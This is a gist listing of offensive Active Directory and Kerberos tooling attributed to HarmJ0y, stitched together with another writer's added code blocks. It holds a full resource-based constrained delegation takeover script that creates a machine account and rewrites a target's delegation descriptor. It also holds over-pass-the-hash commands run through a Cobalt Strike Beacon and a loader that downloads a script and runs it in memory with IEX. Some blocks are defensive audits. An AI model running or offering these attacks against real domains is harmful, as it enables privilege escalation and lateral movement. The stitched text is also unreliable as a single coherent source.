geeking out about Kerberos

Will HarmJ0y

HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL:
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = ""
HarmJ0y / rbcd_demo.ps1
Last active Jul 13, 2021
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
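
The descriptor work the gist sets up, carried through to the attribute write and then decoded again, as an added example that is not the gist's own code. It assumes powermad.ps1 and powerview.ps1 sit in the current directory as in the gist; the machine account name 'attackersystem' and its password are made-up values.

```powershell
# Added example (not the gist's code): build the msDS-AllowedToActOnBehalfOfOtherIdentity
# descriptor, write it with PowerView, then read it back and decode every ACE. The decode is
# the same routine a defender uses to audit which SIDs may delegate to a host.
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

$TargetComputer  = 'primary.testlab.local'
$AttackerMachine = 'attackersystem'     # assumption: name of the machine account we control
$MachinePassword = ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force   # assumption: throwaway password

# 1. add a machine account we own (Powermad; works while ms-DS-MachineAccountQuota allows it)
New-MachineAccount -MachineAccount $AttackerMachine -Password $MachinePassword

# 2. its SID is the trustee we will grant delegation rights to (PowerView returns objectsid as a SID string)
$AttackerSID = Get-DomainComputer $AttackerMachine -Properties objectsid | Select-Object -ExpandProperty objectsid

# 3. a security descriptor whose DACL has one full-control ACE for that SID; the KDC evaluates
#    this DACL during S4U2Proxy, so every SID listed here may delegate to the target
$SDDL    = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$AttackerSID)"
$SD      = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $SDDL
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# 4. write it to the target; GenericWrite over primary$ (the gist's precondition) covers this attribute
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity' = $SDBytes}

# 5. read the attribute back and decode every ACE
function Get-RBCDTrustee {
    param([Parameter(Mandatory = $true)][string]$ComputerName)

    $Raw = Get-DomainComputer $ComputerName -Properties 'msds-allowedtoactonbehalfofotheridentity' |
        Select-Object -ExpandProperty 'msds-allowedtoactonbehalfofotheridentity'
    if (-not $Raw) { return }    # attribute unset: nobody is trusted to delegate to this host

    $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Raw, 0
    foreach ($Ace in $Descriptor.DiscretionaryAcl) {
        $Sid = $Ace.SecurityIdentifier
        try   { $Account = $Sid.Translate([Security.Principal.NTAccount]).Value }
        catch { $Account = '<unresolved>' }    # deleted or foreign-domain trustee
        [PSCustomObject]@{
            Computer   = $ComputerName
            Trustee    = $Account
            SID        = $Sid.Value
            AceType    = $Ace.AceType
            AccessMask = '0x{0:X8}' -f $Ace.AccessMask
        }
    }
}

Get-RBCDTrustee -ComputerName $TargetComputer
```

The takeover then continues with an S4U2Self/S4U2Proxy request made as the new machine account (Rubeus's s4u command) for a service ticket to the target; that step is outside the gist's preview and is not shown here. Run Get-RBCDTrustee across all computer objects and any trustee that is not an expected front-end service account is a finding.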
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Apr 8, 2021
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
function New-SYSVOLZip {
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / DPAPI.ps1
Add-Type -AssemblyName System.Security
# fetch the script text (the URL is elided in the gist)
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
# DPAPI-protect the script bytes under this machine's master key (LocalMachine scope, no optional entropy)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
# unprotect and execute in memory; the blob only decrypts on the host that produced it
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
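
The same Protect/Unprotect pair with the two knobs the gist leaves at their defaults, as an added example that is not the gist's code. A DPAPI blob decrypts only with the master key of the scope it was protected under (this machine for LocalMachine, this user for CurrentUser) and only with the same optional entropy; the entropy mismatch is demonstrated below. The script text is a constructed stand-in for the download, and 'per-operator secret' is an arbitrary entropy value.

```powershell
# Added example (not the gist's code): DPAPI wrap/unwrap with optional entropy and an explicit scope
Add-Type -AssemblyName System.Security

function Protect-ScriptText {
    param(
        [Parameter(Mandatory = $true)][string]$Text,
        [byte[]]$Entropy = $null,
        [Security.Cryptography.DataProtectionScope]$Scope = 'LocalMachine'
    )
    [Security.Cryptography.ProtectedData]::Protect([Text.Encoding]::UTF8.GetBytes($Text), $Entropy, $Scope)
}

function Unprotect-ScriptText {
    param(
        [Parameter(Mandatory = $true)][byte[]]$Blob,
        [byte[]]$Entropy = $null,
        [Security.Cryptography.DataProtectionScope]$Scope = 'LocalMachine'
    )
    try {
        [Text.Encoding]::UTF8.GetString([Security.Cryptography.ProtectedData]::Unprotect($Blob, $Entropy, $Scope))
    }
    catch [Security.Cryptography.CryptographicException] {
        # another host, another user's CurrentUser blob, or different entropy all end up here
        Write-Warning "DPAPI unprotect failed: $($_.Exception.Message)"
        $null
    }
}

$Script  = 'Write-Output "hello from a DPAPI-wrapped script"'     # constructed stand-in for DownloadString()
$Entropy = [Text.Encoding]::UTF8.GetBytes('per-operator secret')   # assumption: any caller-chosen bytes

$Blob = Protect-ScriptText -Text $Script -Entropy $Entropy

# same host, same entropy: plaintext comes back and could be handed to IEX as in the gist
Unprotect-ScriptText -Blob $Blob -Entropy $Entropy

# same host, no entropy: the master key is right but the blob fails to verify -> warning and $null
Unprotect-ScriptText -Blob $Blob
```

Entropy adds nothing against an attacker who already runs code on the host (they can recover it from the script just as they can read the blob), but it does stop a copied blob from being decrypted elsewhere on the same machine by a process that lacks it.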
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jul 22, 2021
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
HarmJ0y / Get-NonstandardService.ps1
function Get-NonstandardService {
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
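
The same check written against Win32_Service, as an added example rather than the gist's implementation. The part worth seeing is the ImagePath parsing the check depends on: service paths arrive quoted, unquoted, with arguments and with %SystemRoot%-style variables, so the executable has to be carved out before Get-AuthenticodeSignature can look at it. The issuer patterns are an assumption about what counts as "standard".

```powershell
# Added example (not the gist's code): services whose binary is unsigned, missing, or signed by a non-Microsoft issuer
function Get-ServiceBinaryPath {
    param([Parameter(Mandatory = $true)][string]$PathName)
    $Expanded = [Environment]::ExpandEnvironmentVariables($PathName).Trim()
    if ($Expanded.StartsWith('"')) {
        $End = $Expanded.IndexOf('"', 1)
        if ($End -gt 1) { return $Expanded.Substring(1, $End - 1) }   # "C:\Program Files\v\svc.exe" -args
    }
    # unquoted: everything up to the first ".exe" followed by whitespace or end of string;
    # this also yields the right file for an unquoted path containing spaces
    $Match = [regex]::Match($Expanded, '(?i)^.*?\.exe(?=\s|$)')
    if ($Match.Success) { return $Match.Value }
    return ($Expanded -split '\s+')[0]                                  # fallback: first token
}

function Find-UnsignedServiceBinary {
    param([string[]]$TrustedIssuerPattern = @('*Microsoft*'))   # assumption: issuers treated as "standard"
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $Svc = $_
        if (-not $Svc.PathName) { return }                        # some services carry no ImagePath
        $Binary = Get-ServiceBinaryPath -PathName $Svc.PathName
        if (Test-Path -LiteralPath $Binary -PathType Leaf) {
            $Sig    = Get-AuthenticodeSignature -LiteralPath $Binary
            $Status = [string]$Sig.Status                         # Valid, NotSigned, HashMismatch, ...
            $Issuer = if ($Sig.SignerCertificate) { $Sig.SignerCertificate.Issuer } else { $null }
        } else {
            $Status = 'FileNotFound'; $Issuer = $null             # missing binary: report it on its own
        }
        $Trusted = [bool]($Issuer -and ($TrustedIssuerPattern | Where-Object { $Issuer -like $_ }))
        if ($Status -ne 'Valid' -or -not $Trusted) {
            [PSCustomObject]@{
                Name = $Svc.Name; StartName = $Svc.StartName; State = $Svc.State
                Binary = $Binary; SignatureStatus = $Status; Issuer = $Issuer
            }
        }
    }
}

Find-UnsignedServiceBinary | Format-Table -AutoSize
```

Two caveats when reading the output: many inbox Windows binaries are catalog-signed rather than carrying an embedded signature, so on a host where Get-AuthenticodeSignature does not consult the catalog they show up as NotSigned and need a hash lookup rather than being treated as findings; and the issuer test is a string match, not chain validation to a specific root, so a certificate whose issuer merely contains "Microsoft" passes it.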
HarmJ0y / powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Jan 22, 2021
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
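
A decoder for the userParameters blob (the Terminal Services profile fields), as an added example that is not the gist's code, together with a builder that constructs a sample blob so it runs offline. The sample's property values are made up; the list of DWORD-typed property names is the subset I am confident of and is an assumption for any name not in it.

```powershell
# Added example (not the gist's code). Layout: 96 reserved bytes, UTF-16 'P' signature, UInt16
# property count, then per property UInt16 NameLength and UInt16 ValueLength (both in bytes),
# UInt16 Type, the name as UTF-16LE and the value as an ASCII hex string of the raw value bytes
# (DWORDs little-endian, strings NUL-terminated, *W names UTF-16).
$DwordProperties = 'CtxCfgPresent','CtxCfgFlags1','CtxShadow','CtxMaxConnectionTime',
                   'CtxMaxDisconnectionTime','CtxMaxIdleTime','CtxKeyboardLayout','CtxMinEncryptionLevel'

function ConvertFrom-TSPropertyBlob {
    param([Parameter(Mandatory = $true)][byte[]]$Bytes)

    if ($Bytes.Length -lt 100) { throw "blob too short ($($Bytes.Length) bytes)" }
    $Signature = [Text.Encoding]::Unicode.GetString($Bytes, 96, 2)
    if ($Signature -ne 'P') { throw "bad signature '$Signature' at offset 96" }

    $Count  = [BitConverter]::ToUInt16($Bytes, 98)
    $Offset = 100
    $Result = [ordered]@{}
    for ($i = 0; $i -lt $Count; $i++) {
        if ($Offset + 6 -gt $Bytes.Length) { throw "truncated property header at offset $Offset" }
        $NameLen  = [BitConverter]::ToUInt16($Bytes, $Offset)
        $ValueLen = [BitConverter]::ToUInt16($Bytes, $Offset + 2)
        $Type     = [BitConverter]::ToUInt16($Bytes, $Offset + 4)
        $Offset  += 6
        if ($Offset + $NameLen + $ValueLen -gt $Bytes.Length) { throw "truncated property body at offset $Offset" }

        $Name = [Text.Encoding]::Unicode.GetString($Bytes, $Offset, $NameLen); $Offset += $NameLen
        $Hex  = [Text.Encoding]::ASCII.GetString($Bytes, $Offset, $ValueLen);  $Offset += $ValueLen
        if ($Hex.Length % 2 -ne 0) { throw "odd-length hex value for $Name" }

        # two ASCII hex digits per raw value byte
        $Value = New-Object byte[] ($Hex.Length / 2)
        for ($j = 0; $j -lt $Value.Length; $j++) { $Value[$j] = [Convert]::ToByte($Hex.Substring(2 * $j, 2), 16) }

        $Decoded = if ($DwordProperties -contains $Name -and $Value.Length -eq 4) {
            [BitConverter]::ToUInt32($Value, 0)
        } elseif ($Name.EndsWith('W')) {
            [Text.Encoding]::Unicode.GetString($Value).TrimEnd([char]0)
        } else {
            [Text.Encoding]::ASCII.GetString($Value).TrimEnd([char]0)
        }
        $Result[$Name] = [PSCustomObject]@{ Type = $Type; Hex = $Hex; Value = $Decoded }
    }
    $Result
}

# builder used only to construct the sample below (same layout, Type fixed to 1)
function New-TSPropertyBlob {
    param([Parameter(Mandatory = $true)][Collections.IDictionary]$Properties)   # name -> raw value bytes
    $Out = New-Object Collections.Generic.List[byte]
    $Out.AddRange([byte[]](@(0x20) * 96))
    $Out.AddRange([Text.Encoding]::Unicode.GetBytes('P'))
    $Out.AddRange([BitConverter]::GetBytes([uint16]$Properties.Count))
    foreach ($Name in $Properties.Keys) {
        $NameBytes = [Text.Encoding]::Unicode.GetBytes($Name)
        $HexBytes  = [Text.Encoding]::ASCII.GetBytes((($Properties[$Name] | ForEach-Object { $_.ToString('x2') }) -join ''))
        $Out.AddRange([BitConverter]::GetBytes([uint16]$NameBytes.Length))
        $Out.AddRange([BitConverter]::GetBytes([uint16]$HexBytes.Length))
        $Out.AddRange([BitConverter]::GetBytes([uint16]1))
        $Out.AddRange($NameBytes)
        $Out.AddRange($HexBytes)
    }
    ,$Out.ToArray()
}

# constructed sample: the CtxCfgPresent magic 0xB00B1E55 (little-endian), shadowing mode 1, a profile path
$Sample = New-TSPropertyBlob -Properties ([ordered]@{
    'CtxCfgPresent'    = [byte[]](0x55, 0x1E, 0x0B, 0xB0)
    'CtxShadow'        = [byte[]](0x01, 0x00, 0x00, 0x00)
    'CtxWFProfilePath' = [Text.Encoding]::ASCII.GetBytes("\\fs01\profiles\jdoe`0")
})
ConvertFrom-TSPropertyBlob -Bytes $Sample
```

On a real object, feed it the raw attribute (for example the byte[] returned by PowerView's Get-DomainUser -Properties userparameters). The length checks matter more than they look: the attribute is writable by anyone with write access to the user object, so a decoder that trusts NameLength and ValueLength blindly will read past the end of the buffer on a crafted value.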